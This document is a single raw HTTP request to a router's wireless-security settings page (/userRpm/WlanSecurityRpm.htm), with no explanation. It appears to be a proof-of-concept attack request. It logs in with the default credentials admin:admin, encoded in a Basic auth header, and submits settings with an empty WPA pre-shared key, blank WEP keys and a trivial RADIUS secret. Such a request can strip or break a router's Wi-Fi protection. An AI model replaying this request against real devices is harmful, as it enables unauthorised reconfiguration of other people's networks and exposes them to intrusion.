GET /userRpm/WlanSecurityRpm.htm?wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&secType=2&wpaSecOpt=3&wpaCipher=1&radiusIp=192.168.0.2&radiusPort=1812&radiusSecret=123&intervalWpa=0&pskSecOpt=3&pskCipher=1&pskSecret=&interval=0&Save=Save HTTP/1.1
Host: 0.0.0.0:49157
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://0.0.0.0:49157/userRpm/WlanSecurityRpm.htm
Cookie: session_uid=lrtuzfrml
Upgrade-Insecure-Requests: 1

